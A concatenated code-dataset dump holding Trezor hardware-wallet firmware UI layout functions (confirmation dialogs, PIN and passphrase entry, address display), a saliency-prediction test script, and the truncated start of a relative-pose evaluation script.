dummy_set_timer(token: int, deadline: int) -> None:\n raise RuntimeError\n\n layout.attach_timer_fn(dummy_set_timer)\n ui.display.clear()\n layout.paint()\n ui.refresh()\n\n\n# Temporary function, so we know where it is used\n# Should be gradually replaced by custom designs/layouts\nasync def _placeholder_confirm(\n ctx: GenericContext,\n br_type: str,\n title: str,\n data: str | None = None,\n description: str | None = None,\n *,\n verb: str = \"CONFIRM\",\n verb_cancel: str | None = \"\",\n hold: bool = False,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> Any:\n return await confirm_action(\n ctx,\n br_type,\n title.upper(),\n data,\n description,\n verb=verb,\n verb_cancel=verb_cancel,\n hold=hold,\n reverse=True,\n br_code=br_code,\n )\n\n\nasync def get_bool(\n ctx: GenericContext,\n br_type: str,\n title: str,\n data: str | None = None,\n description: str | None = None,\n verb: str = \"CONFIRM\",\n verb_cancel: str | None = \"\",\n hold: bool = False,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> bool:\n result = await interact(\n ctx,\n RustLayout(\n trezorui2.confirm_action(\n title=title.upper(),\n action=data,\n description=description,\n verb=verb,\n verb_cancel=verb_cancel,\n hold=hold,\n )\n ),\n br_type,\n br_code,\n )\n\n return result is CONFIRMED\n\n\nasync def raise_if_not_confirmed(a: Awaitable[T], exc: Any = ActionCancelled) -> T:\n result = await a\n if result is not CONFIRMED:\n raise exc\n return result\n\n\nasync def confirm_action(\n ctx: GenericContext,\n br_type: str,\n title: str,\n action: str | None = None,\n description: str | None = None,\n description_param: str | None = None,\n verb: str = \"CONFIRM\",\n verb_cancel: str | None = \"\",\n hold: bool = False,\n hold_danger: bool = False,\n reverse: bool = False,\n exc: ExceptionType = ActionCancelled,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> None:\n if verb_cancel is not None:\n verb_cancel = verb_cancel.upper()\n\n if description is not None and description_param is not None:\n description = description.format(description_param)\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_action(\n title=title.upper(),\n action=action,\n description=description,\n verb=verb.upper(),\n verb_cancel=verb_cancel,\n hold=hold,\n reverse=reverse,\n )\n ),\n br_type,\n br_code,\n ),\n exc,\n )\n\n\nasync def confirm_single(\n ctx: GenericContext,\n br_type: str,\n title: str,\n description: str,\n description_param: str | None = None,\n verb: str | None = None,\n) -> None:\n description_param = description_param or \"\"\n begin, _separator, end = description.partition(\"{}\")\n await confirm_action(\n ctx,\n br_type,\n title,\n description=begin + description_param + end,\n verb=verb or \"CONFIRM\",\n br_code=ButtonRequestType.ProtectCall,\n )\n\n\nasync def confirm_reset_device(\n ctx: GenericContext,\n title: str,\n recovery: bool = False,\n) -> None:\n if recovery:\n button = \"RECOVER WALLET\"\n else:\n button = \"CREATE WALLET\"\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_reset_device(\n title=title.upper(),\n button=button,\n )\n ),\n \"recover_device\" if recovery else \"setup_device\",\n ButtonRequestType.ProtectCall\n if recovery\n else ButtonRequestType.ResetDevice,\n )\n )\n\n\n# TODO cleanup @ redesign\nasync def confirm_backup(ctx: GenericContext) -> bool:\n if await get_bool(\n ctx,\n \"backup_device\",\n \"SUCCESS\",\n description=\"New wallet has been created.\\nIt should be backed up now!\",\n verb=\"BACK 
UP\",\n verb_cancel=\"SKIP\",\n br_code=ButtonRequestType.ResetDevice,\n ):\n return True\n\n return await get_bool(\n ctx,\n \"backup_device\",\n \"WARNING\",\n \"Are you sure you want to skip the backup?\\n\",\n \"You can back up your Trezor once, at any time.\",\n verb=\"BACK UP\",\n verb_cancel=\"SKIP\",\n br_code=ButtonRequestType.ResetDevice,\n )\n\n\nasync def confirm_path_warning(\n ctx: GenericContext,\n path: str,\n path_type: str | None = None,\n) -> None:\n if path_type:\n title = f\"Unknown {path_type}\"\n else:\n title = \"Unknown path\"\n return await _placeholder_confirm(\n ctx,\n \"path_warning\",\n title.upper(),\n description=path,\n br_code=ButtonRequestType.UnknownDerivationPath,\n )\n\n\nasync def confirm_homescreen(\n ctx: GenericContext,\n image: bytes,\n) -> None:\n # TODO: show homescreen preview?\n await confirm_action(\n ctx,\n \"set_homescreen\",\n \"Set homescreen\",\n description=\"Do you really want to set new homescreen image?\",\n br_code=ButtonRequestType.ProtectCall,\n )\n\n\ndef _show_xpub(xpub: str, title: str, cancel: str | None) -> ui.Layout:\n return RustLayout(\n trezorui2.confirm_blob(\n title=title.upper(),\n data=xpub,\n verb_cancel=cancel,\n description=None,\n extra=None,\n )\n )\n\n\nasync def show_xpub(ctx: GenericContext, xpub: str, title: str) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n _show_xpub(xpub, title, None),\n \"show_xpub\",\n ButtonRequestType.PublicKey,\n )\n )\n\n\nasync def show_address(\n ctx: GenericContext,\n address: str,\n *,\n address_qr: str | None = None,\n case_sensitive: bool = True,\n path: str | None = None,\n account: str | None = None,\n network: str | None = None,\n multisig_index: int | None = None,\n xpubs: Sequence[str] = (),\n) -> None:\n send_button_request = True\n # Will be a marquee in case of multisig\n title = (\n \"RECEIVE ADDRESS (MULTISIG)\"\n if multisig_index is not None\n else \"RECEIVE ADDRESS\"\n )\n while True:\n layout = RustLayout(\n trezorui2.confirm_address(\n title=title,\n data=address,\n description=\"\", # unused on TR\n extra=None, # unused on TR\n )\n )\n if send_button_request:\n send_button_request = False\n await button_request(\n ctx,\n \"show_address\",\n ButtonRequestType.Address,\n pages=layout.page_count(),\n )\n result = await ctx.wait(layout)\n\n # User confirmed with middle button.\n if result is CONFIRMED:\n break\n\n # User pressed right button, go to address details.\n elif result is INFO:\n\n def xpub_title(i: int) -> str:\n # Will be marquee (cannot fit one line)\n result = f\"MULTISIG XPUB #{i + 1}\"\n result += \" (YOURS)\" if i == multisig_index else \" (COSIGNER)\"\n return result\n\n result = await ctx.wait(\n RustLayout(\n trezorui2.show_address_details(\n address=address if address_qr is None else address_qr,\n case_sensitive=case_sensitive,\n account=account,\n path=path,\n xpubs=[(xpub_title(i), xpub) for i, xpub in enumerate(xpubs)],\n )\n ),\n )\n # Can only go back from the address details.\n assert result is CANCELLED\n\n # User pressed left cancel button, show mismatch dialogue.\n else:\n result = await ctx.wait(RustLayout(trezorui2.show_mismatch()))\n assert result in (CONFIRMED, CANCELLED)\n # Right button aborts action, left goes back to showing address.\n if result is CONFIRMED:\n raise ActionCancelled\n\n\ndef show_pubkey(\n ctx: Context, pubkey: str, title: str = \"Confirm public key\"\n) -> Awaitable[None]:\n return confirm_blob(\n ctx,\n \"show_pubkey\",\n title.upper(),\n pubkey,\n br_code=ButtonRequestType.PublicKey,\n 
)\n\n\nasync def _show_modal(\n ctx: GenericContext,\n br_type: str,\n header: str,\n subheader: str | None,\n content: str,\n button_confirm: str | None,\n button_cancel: str | None,\n br_code: ButtonRequestType,\n exc: ExceptionType = ActionCancelled,\n) -> None:\n await confirm_action(\n ctx,\n br_type,\n header.upper(),\n subheader,\n content,\n verb=button_confirm or \"\",\n verb_cancel=button_cancel,\n exc=exc,\n br_code=br_code,\n )\n\n\nasync def show_error_and_raise(\n ctx: GenericContext,\n br_type: str,\n content: str,\n header: str = \"Error\",\n subheader: str | None = None,\n button: str = \"Close\",\n red: bool = False, # unused on TR\n exc: ExceptionType = ActionCancelled,\n) -> NoReturn:\n await _show_modal(\n ctx,\n br_type,\n header,\n subheader,\n content,\n button_confirm=None,\n button_cancel=button,\n br_code=BR_TYPE_OTHER,\n exc=exc,\n )\n raise exc\n\n\ndef show_warning(\n ctx: GenericContext,\n br_type: str,\n content: str,\n subheader: str | None = None,\n button: str = \"Try again\",\n br_code: ButtonRequestType = ButtonRequestType.Warning,\n) -> Awaitable[None]:\n return _show_modal(\n ctx,\n br_type,\n \"\",\n subheader or \"WARNING\",\n content,\n button_confirm=button,\n button_cancel=None,\n br_code=br_code,\n )\n\n\ndef show_success(\n ctx: GenericContext,\n br_type: str,\n content: str,\n subheader: str | None = None,\n button: str = \"Continue\",\n) -> Awaitable[None]:\n title = \"Success\"\n\n # In case only subheader is supplied, showing it\n # in regular font, not bold.\n if not content and subheader:\n content = subheader\n subheader = None\n\n # Special case for Shamir backup - to show everything just on one page\n # in regular font.\n if \"Continue with\" in content:\n content = f\"{subheader}\\n{content}\"\n subheader = None\n title = \"\"\n\n return _show_modal(\n ctx,\n br_type,\n title,\n subheader,\n content,\n button_confirm=button,\n button_cancel=None,\n br_code=ButtonRequestType.Success,\n )\n\n\nasync def confirm_output(\n ctx: GenericContext,\n address: str,\n amount: str,\n title: str = \"Confirm sending\",\n hold: bool = False,\n br_code: ButtonRequestType = ButtonRequestType.ConfirmOutput,\n address_label: str | None = None,\n output_index: int | None = None,\n) -> None:\n address_title = (\n \"RECIPIENT\" if output_index is None else f\"RECIPIENT #{output_index + 1}\"\n )\n amount_title = \"AMOUNT\" if output_index is None else f\"AMOUNT #{output_index + 1}\"\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_output(\n address=address,\n address_label=address_label or \"\",\n address_title=address_title,\n amount_title=amount_title,\n amount=amount,\n )\n ),\n \"confirm_output\",\n br_code,\n )\n )\n\n\nasync def tutorial(\n ctx: GenericContext,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> None:\n \"\"\"Showing users how to interact with the device.\"\"\"\n await interact(\n ctx,\n RustLayout(trezorui2.tutorial()),\n \"tutorial\",\n br_code,\n )\n\n\nasync def confirm_payment_request(\n ctx: GenericContext,\n recipient_name: str,\n amount: str,\n memos: list[str],\n) -> Any:\n memos_str = \"\\n\".join(memos)\n return await _placeholder_confirm(\n ctx,\n \"confirm_payment_request\",\n \"CONFIRM SENDING\",\n description=f\"{amount} to\\n{recipient_name}\\n{memos_str}\",\n br_code=ButtonRequestType.ConfirmOutput,\n )\n\n\nasync def should_show_more(\n ctx: GenericContext,\n title: str,\n para: Iterable[tuple[int, str]],\n button_text: str = \"Show all\",\n br_type: str = \"should_show_more\",\n 
br_code: ButtonRequestType = BR_TYPE_OTHER,\n confirm: str | bytes | None = None,\n) -> bool:\n \"\"\"Return True if the user wants to show more (they click a special button)\n and False when the user wants to continue without showing details.\n\n Raises ActionCancelled if the user cancels.\n \"\"\"\n if confirm is None or not isinstance(confirm, str):\n confirm = \"CONFIRM\"\n\n result = await interact(\n ctx,\n RustLayout(\n trezorui2.confirm_with_info(\n title=title.upper(),\n items=para,\n button=confirm.upper(),\n info_button=button_text.upper(),\n )\n ),\n br_type,\n br_code,\n )\n\n if result is CONFIRMED:\n return False\n elif result is INFO:\n return True\n else:\n assert result is CANCELLED\n raise ActionCancelled\n\n\nasync def confirm_blob(\n ctx: GenericContext,\n br_type: str,\n title: str,\n data: bytes | str,\n description: str | None = None,\n hold: bool = False,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n ask_pagination: bool = False,\n) -> None:\n title = title.upper()\n description = description or \"\"\n layout = RustLayout(\n trezorui2.confirm_blob(\n title=title,\n description=description,\n data=data,\n extra=None,\n hold=hold,\n )\n )\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n layout,\n br_type,\n br_code,\n )\n )\n\n\nasync def confirm_address(\n ctx: GenericContext,\n title: str,\n address: str,\n description: str | None = \"Address:\",\n br_type: str = \"confirm_address\",\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> Awaitable[None]:\n return confirm_blob(\n ctx,\n br_type,\n title.upper(),\n address,\n description,\n br_code=br_code,\n )\n\n\nasync def confirm_text(\n ctx: GenericContext,\n br_type: str,\n title: str,\n data: str,\n description: str | None = None,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> Any:\n return await _placeholder_confirm(\n ctx,\n br_type,\n title,\n data,\n description,\n br_code=br_code,\n )\n\n\ndef confirm_amount(\n ctx: GenericContext,\n title: str,\n amount: str,\n description: str = \"Amount:\",\n br_type: str = \"confirm_amount\",\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> Awaitable[None]:\n return confirm_blob(\n ctx,\n br_type,\n title.upper(),\n amount,\n description,\n br_code=br_code,\n )\n\n\nasync def confirm_properties(\n ctx: GenericContext,\n br_type: str,\n title: str,\n props: Iterable[PropertyType],\n hold: bool = False,\n br_code: ButtonRequestType = ButtonRequestType.ConfirmOutput,\n) -> None:\n from ubinascii import hexlify\n\n def handle_bytes(prop: PropertyType):\n if isinstance(prop[1], bytes):\n return (prop[0], hexlify(prop[1]).decode(), True)\n else:\n # When there is not space in the text, taking it as data\n # to not include hyphens\n is_data = prop[1] and \" \" not in prop[1]\n return (prop[0], prop[1], is_data)\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_properties(\n title=title.upper(),\n items=map(handle_bytes, props), # type: ignore [cannot be assigned to parameter \"items\"]\n hold=hold,\n )\n ),\n br_type,\n br_code,\n )\n )\n\n\ndef confirm_value(\n ctx: GenericContext,\n title: str,\n value: str,\n description: str,\n br_type: str,\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n *,\n verb: str | None = None,\n hold: bool = False,\n) -> Awaitable[None]:\n \"\"\"General confirmation dialog, used by many other confirm_* functions.\"\"\"\n\n if not verb and not hold:\n raise ValueError(\"Either verb or hold=True must be set\")\n\n return raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n 
trezorui2.confirm_value( # type: ignore [Argument missing for parameter \"subtitle\"]\n title=title.upper(),\n description=description,\n value=value,\n verb=verb or \"HOLD TO CONFIRM\",\n hold=hold,\n )\n ),\n br_type,\n br_code,\n )\n )\n\n\nasync def confirm_total(\n ctx: GenericContext,\n total_amount: str,\n fee_amount: str,\n fee_rate_amount: str | None = None,\n title: str = \"SENDING\",\n total_label: str = \"TOTAL AMOUNT\",\n fee_label: str = \"Including fee:\",\n account_label: str | None = None,\n br_type: str = \"confirm_total\",\n br_code: ButtonRequestType = ButtonRequestType.SignTx,\n) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n # TODO: resolve these differences in TT's and TR's confirm_total\n trezorui2.confirm_total( # type: ignore [Arguments missing]\n total_amount=total_amount, # type: ignore [No parameter named]\n fee_amount=fee_amount, # type: ignore [No parameter named]\n fee_rate_amount=fee_rate_amount, # type: ignore [No parameter named]\n account_label=account_label, # type: ignore [No parameter named]\n total_label=total_label.upper(), # type: ignore [No parameter named]\n fee_label=fee_label, # type: ignore [No parameter named]\n )\n ),\n br_type,\n br_code,\n )\n )\n\n\nasync def confirm_joint_total(\n ctx: GenericContext, spending_amount: str, total_amount: str\n) -> None:\n\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_joint_total(\n spending_amount=spending_amount,\n total_amount=total_amount,\n )\n ),\n \"confirm_joint_total\",\n ButtonRequestType.SignTx,\n )\n )\n\n\nasync def confirm_metadata(\n ctx: GenericContext,\n br_type: str,\n title: str,\n content: str,\n param: str | None = None,\n br_code: ButtonRequestType = ButtonRequestType.SignTx,\n hold: bool = False,\n) -> None:\n await _placeholder_confirm(\n ctx,\n br_type,\n title.upper(),\n description=content.format(param),\n hold=hold,\n br_code=br_code,\n )\n\n\nasync def confirm_replacement(ctx: GenericContext, description: str, txid: str) -> None:\n await confirm_value(\n ctx,\n description.upper(),\n txid,\n \"Confirm transaction ID:\",\n \"confirm_replacement\",\n ButtonRequestType.SignTx,\n verb=\"CONFIRM\",\n )\n\n\nasync def confirm_modify_output(\n ctx: GenericContext,\n address: str,\n sign: int,\n amount_change: str,\n amount_new: str,\n) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_modify_output(\n address=address,\n sign=sign,\n amount_change=amount_change,\n amount_new=amount_new,\n )\n ),\n \"modify_output\",\n ButtonRequestType.ConfirmOutput,\n )\n )\n\n\nasync def confirm_modify_fee(\n ctx: GenericContext,\n title: str,\n sign: int,\n user_fee_change: str,\n total_fee_new: str,\n fee_rate_amount: str | None = None,\n) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_modify_fee(\n title=title,\n sign=sign,\n user_fee_change=user_fee_change,\n total_fee_new=total_fee_new,\n fee_rate_amount=fee_rate_amount,\n )\n ),\n \"modify_fee\",\n ButtonRequestType.SignTx,\n )\n )\n\n\nasync def confirm_coinjoin(\n ctx: GenericContext, max_rounds: int, max_fee_per_vbyte: str\n) -> None:\n await raise_if_not_confirmed(\n interact(\n ctx,\n RustLayout(\n trezorui2.confirm_coinjoin(\n max_rounds=str(max_rounds),\n max_feerate=max_fee_per_vbyte,\n )\n ),\n \"coinjoin_final\",\n BR_TYPE_OTHER,\n )\n )\n\n\n# TODO cleanup @ redesign\nasync def confirm_sign_identity(\n ctx: GenericContext, proto: str, identity: str, challenge_visual: str | 
None\n) -> None:\n text = \"\"\n if challenge_visual:\n text += f\"{challenge_visual}\\n\\n\"\n text += identity\n\n await _placeholder_confirm(\n ctx,\n \"confirm_sign_identity\",\n f\"Sign {proto}\".upper(),\n text,\n br_code=BR_TYPE_OTHER,\n )\n\n\nasync def confirm_signverify(\n ctx: GenericContext, coin: str, message: str, address: str, verify: bool\n) -> None:\n if verify:\n header = f\"Verify {coin} message\"\n br_type = \"verify_message\"\n else:\n header = f\"Sign {coin} message\"\n br_type = \"sign_message\"\n\n await confirm_blob(\n ctx,\n br_type,\n header.upper(),\n address,\n \"Confirm address:\",\n br_code=BR_TYPE_OTHER,\n )\n\n await confirm_value(\n ctx,\n header.upper(),\n message,\n \"Confirm message:\",\n br_type,\n BR_TYPE_OTHER,\n verb=\"CONFIRM\",\n )\n\n\nasync def show_error_popup(\n title: str,\n description: str,\n subtitle: str | None = None,\n description_param: str = \"\",\n *,\n button: str = \"\",\n timeout_ms: int = 0,\n) -> None:\n if button:\n raise NotImplementedError(\"Button not implemented\")\n description = description.format(description_param)\n if subtitle:\n description = f\"{subtitle}\\n{description}\"\n await RustLayout(\n trezorui2.show_info(\n title=title,\n description=description,\n time_ms=timeout_ms,\n )\n )\n\n\ndef request_passphrase_on_host() -> None:\n draw_simple(\n trezorui2.show_info(\n title=\"HIDDEN WALLET\",\n description=\"Please type your passphrase on the connected host.\",\n )\n )\n\n\nasync def request_passphrase_on_device(ctx: GenericContext, max_len: int) -> str:\n await button_request(\n ctx, \"passphrase_device\", code=ButtonRequestType.PassphraseEntry\n )\n\n result = await ctx.wait(\n RustLayout(\n trezorui2.request_passphrase(\n prompt=\"ENTER PASSPHRASE\",\n max_len=max_len,\n )\n )\n )\n if result is CANCELLED:\n raise ActionCancelled(\"Passphrase entry cancelled\")\n\n assert isinstance(result, str)\n return result\n\n\nasync def request_pin_on_device(\n ctx: GenericContext,\n prompt: str,\n attempts_remaining: int | None,\n allow_cancel: bool,\n wrong_pin: bool = False,\n) -> str:\n from trezor import wire\n\n # Not showing the prompt in case user did not enter it badly yet\n # (has full 16 attempts left)\n if attempts_remaining is None or attempts_remaining == 16:\n subprompt = \"\"\n elif attempts_remaining == 1:\n subprompt = \"Last attempt\"\n else:\n subprompt = f\"{attempts_remaining} tries left\"\n\n await button_request(ctx, \"pin_device\", code=ButtonRequestType.PinEntry)\n\n dialog = RustLayout(\n trezorui2.request_pin(\n prompt=prompt,\n subprompt=subprompt,\n allow_cancel=allow_cancel,\n wrong_pin=wrong_pin,\n )\n )\n\n result = await ctx.wait(dialog)\n if result is CANCELLED:\n raise wire.PinCancelled\n assert isinstance(result, str)\n return result\n\n\nasync def confirm_reenter_pin(\n ctx: GenericContext,\n is_wipe_code: bool = False,\n) -> None:\n br_type = \"reenter_wipe_code\" if is_wipe_code else \"reenter_pin\"\n title = \"CHECK WIPE CODE\" if is_wipe_code else \"CHECK PIN\"\n return await confirm_action(\n ctx,\n br_type,\n title,\n action=\"Please re-enter to confirm.\",\n verb=\"BEGIN\",\n br_code=BR_TYPE_OTHER,\n )\n\n\nasync def pin_mismatch_popup(\n ctx: GenericContext,\n is_wipe_code: bool = False,\n) -> None:\n title = \"WIPE CODE MISMATCH\" if is_wipe_code else \"PIN MISMATCH\"\n description = \"wipe codes\" if is_wipe_code else \"PINs\"\n return await confirm_action(\n ctx,\n \"pin_mismatch\",\n title,\n description=f\"The {description} you entered do not match.\\nPlease try 
again.\",\n verb=\"TRY AGAIN\",\n verb_cancel=None,\n br_code=BR_TYPE_OTHER,\n )\n\n\nasync def wipe_code_same_as_pin_popup(\n ctx: GenericContext,\n is_wipe_code: bool = False,\n) -> None:\n return await confirm_action(\n ctx,\n \"wipe_code_same_as_pin\",\n \"INVALID WIPE CODE\",\n description=\"The wipe code must be different from your PIN.\\nPlease try again.\",\n verb=\"TRY AGAIN\",\n verb_cancel=None,\n br_code=BR_TYPE_OTHER,\n )\n\n\nasync def confirm_set_new_pin(\n ctx: GenericContext,\n br_type: str,\n title: str,\n description: str,\n information: list[str],\n br_code: ButtonRequestType = BR_TYPE_OTHER,\n) -> None:\n await confirm_action(\n ctx,\n br_type,\n title,\n description=description,\n verb=\"ENABLE\",\n br_code=br_code,\n )\n\n # Additional information for the user to know about PIN/WIPE CODE\n\n if \"wipe_code\" in br_type:\n verb = \"HODL TO BEGIN\" # Easter egg from @Hannsek\n else:\n information.append(\n \"Position of individual numbers will change between entries for enhanced security.\"\n )\n verb = \"HOLD TO BEGIN\"\n\n return await confirm_action(\n ctx,\n br_type,\n \"\",\n description=\"\\n\\r\".join(information),\n verb=verb,\n hold=True,\n br_code=br_code,\n )\n\n\nasync def mnemonic_word_entering(ctx: GenericContext) -> None:\n await confirm_action(\n ctx,\n \"request_word\",\n \"WORD ENTERING\",\n description=\"You'll only have to select the first 2-3 letters.\",\n verb=\"CONTINUE\",\n verb_cancel=None,\n br_code=ButtonRequestType.MnemonicInput,\n )\n","repo_name":"Migos24/firmware-master","sub_path":"firmware-master/core/src/trezor/ui/layouts/tr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":36434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71211526313","text":"import argparse\nimport os\nfrom dataset import get_loader, get_loader_test\nfrom solver import Solver\n\n\ndef main(config):\n if config.mode == 'train':\n pass\n elif config.mode == 'test':\n test_loader = get_loader_test(config.test_path, config.test_label, config.img_size, config.batch_size,\n mode='test',\n filename=config.test_file, num_thread=config.num_thread)\n if not os.path.exists(config.test_fold): os.mkdir(config.test_fold)\n test = Solver(None, None, test_loader, config)\n test.test()\n\n else:\n raise IOError(\"illegal input!!!\")\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n \n # Hyper-parameters\n parser.add_argument('--n_color', type=int, default=3)\n parser.add_argument('--lr', type=float, default=3e-3)\n parser.add_argument('--clip_gradient', type=float, default=1.0)\n parser.add_argument('--cuda', type=bool, default=True)\n\n # Training settings\n parser.add_argument('--multi_gpu', type=bool, default=True)\n parser.add_argument('--vgg', type=str, default='')\n parser.add_argument('--train_path', type=str, default='')\n parser.add_argument('--label_path', type=str, default='')\n parser.add_argument('--img_size', type=int, default=None) # 256\n parser.add_argument('--epoch', type=int, default=100)\n parser.add_argument('--batch_size', type=int, default=1) # 8\n parser.add_argument('--val', type=bool, default=True)\n parser.add_argument('--val_path', type=str, default='')\n parser.add_argument('--val_label', type=str, default='')\n\n parser.add_argument('--num_thread', type=int, default=4)\n parser.add_argument('--load', type=str, default='')\n parser.add_argument('--save_fold', type=str, default='./results')\n parser.add_argument('--epoch_val', type=int, 
default=1)\n parser.add_argument('--epoch_save', type=int, default=1)\n parser.add_argument('--epoch_show', type=int, default=1)\n parser.add_argument('--pre_trained', type=str, default=None)\n\n # Testing settings\n parser.add_argument('--backbone', type=str, default='Res18') # Res18, Res18Fixed\n parser.add_argument('--test_path', type=str, default='')\n parser.add_argument('--test_label', type=str, default='')\n parser.add_argument('--test_file', type=str, default=None)\n parser.add_argument('--model', type=str, default='')\n parser.add_argument('--test_fold', type=str, default='')\n parser.add_argument('--use_crf', type=bool, default=False)\n\n # Misc\n parser.add_argument('--mode', type=str, default='test', choices=['train', 'test'])\n parser.add_argument('--visdom', type=bool, default=False)\n\n config = parser.parse_args()\n if config.test_file is None:\n if 'SALICON/images/test' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_SALICON')\n elif 'SALICON/images/val' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Val_SALICON')\n elif 'MIT1003/val' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Val_MIT1003')\n elif 'MIT1003/all' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'All_MIT1003')\n elif 'MIT300' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_MIT300')\n elif 'CAT2000' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_CAT2000')\n elif 'PseudoSal' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Val_PseudoSal')\n elif 'DUT-OMRON' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_DUT-OMRON')\n elif 'PASCAL-S' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_PASCAL-S')\n elif 'TORONTO' in config.test_path:\n config.test_fold = os.path.join(config.save_fold, 'Test_TORONTO')\n else:\n raise NotImplementedError\n else:\n if 'Eye_Fixation_Test_SALICON' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_SALICON')\n elif 'Eye_Fixation_Val_SALICON' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Val_SALICON')\n elif 'Eye_Fixation_Val_MIT1003' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Val_MIT1003')\n elif 'Eye_Fixation_All_MIT1003' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'All_MIT1003')\n elif 'Eye_Fixation_Test_MIT300' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_MIT300')\n elif 'Eye_Fixation_Test_CAT2000' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_CAT2000')\n elif 'Val_Eye_Fixation_PseudoSal_all' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Val_PseudoSal')\n elif 'Eye_Fixation_Train_DUT-OMRON' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_DUT-OMRON')\n elif 'Eye_Fixation_Train_PASCAL-S' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_PASCAL-S')\n elif 'Eye_Fixation_Train_TORONTO' in config.test_file:\n config.test_fold = os.path.join(config.save_fold, 'Test_TORONTO')\n else:\n raise NotImplementedError\n\n if not os.path.exists(config.save_fold): os.mkdir(config.save_fold)\n 
main(config)\n","repo_name":"gqding/SalFBNet","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"fa","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"30151286640","text":"\nfrom torch.utils.data import DataLoader\nimport copy\nfrom progress.bar import Bar\nimport config\nimport os\nimport numpy as np\nimport torch\nimport cv2\nimport matplotlib.pyplot as plt\nfrom utils import torch_op\nimport util\nfrom RPModule.rpmodule import RelativePoseEstimation,getMatchingPrimitive,RelativePoseEstimation_helper\nfrom RPModule.rputil import opts\nimport argparse\nfrom model.mymodel import SCNet\nimport time\nfrom baselines import super4pcs, open3d_global_registration, open3d_fast_global_registration,open3d_color_registration\nfrom open3d import *\nimport logging\n\n\ndef getLoader(args):\n testOption='test'\n if 'suncg' in args.dataList:\n from datasets.SUNCG import SUNCG as Dataset\n dataset_name='suncg'\n val_dataset = Dataset(testOption, nViews=config.nViews,meta=False,rotate=False,rgbd=True,hmap=False,segm=True,normal=True,list_=f\"./data/dataList/{args.dataList}.npy\",singleView=0,entrySplit=args.entrySplit)\n elif 'matterport' in args.dataList:\n from datasets.Matterport3D import Matterport3D as Dataset\n dataset_name='matterport'\n val_dataset = Dataset(testOption, nViews=config.nViews,meta=False,rotate=False,rgbd=True,hmap=False,segm=True,normal=True,list_=f\"./data/dataList/{args.dataList}.npy\",singleView=0,entrySplit=args.entrySplit)\n elif 'scannet' in args.dataList:\n from datasets.ScanNet import ScanNet as Dataset\n dataset_name='scannet'\n val_dataset = Dataset(testOption, nViews=config.nViews,meta=False,rotate=False,rgbd=True,hmap=False,segm=True,normal=True,list_=f\"./data/dataList/{args.dataList}.npy\",singleView=0,fullsize_rgbdn=True,entrySplit=args.entrySplit,representation=args.representation)\n if args.debug:\n loader = DataLoader(val_dataset, batch_size=1, shuffle=False,drop_last=True,collate_fn=util.collate_fn_cat, worker_init_fn=util.worker_init_fn)\n else:\n loader = DataLoader(val_dataset, batch_size=1, shuffle=False,num_workers=1,drop_last=True,collate_fn=util.collate_fn_cat, worker_init_fn=util.worker_init_fn)\n return dataset_name,loader\n\ndef _parse_args():\n \n parser = argparse.ArgumentParser(description='Optional app description')\n parser.add_argument('--dataList', type = str, default = 'matterport3dv1', help = 'options: suncgv3,scannetv1,matterport3dv1')\n parser.add_argument('--sigmaDist',type=float, default=0.04, help = 'parameter for our pairwise matching algorithm')\n parser.add_argument('--sigmaAngle1',type=float, default=0.2615,help = 'parameter for our pairwise matching algorithm')\n parser.add_argument('--sigmaAngle2',type=float, default=0.2615, help = 'parameter for our pairwise matching algorithm')\n parser.add_argument('--sigmaFeat',type=float, default=0.01, help = 'parameter for our pairwise matching algorithm')\n parser.add_argument('--maxIter',type=int,default=1000, help = 'number of pairs to be tested')\n parser.add_argument('--outputType',type=str,default='rgbdnsf', help = 'types of output')\n parser.add_argument('--debug',action='store_true', help = 'for debug')\n parser.add_argument('--exp',type=str,default='', help = 'will create a folder with such name under experiments/')\n parser.add_argument('--snumclass',type=int,default=15, help = 'number of semantic 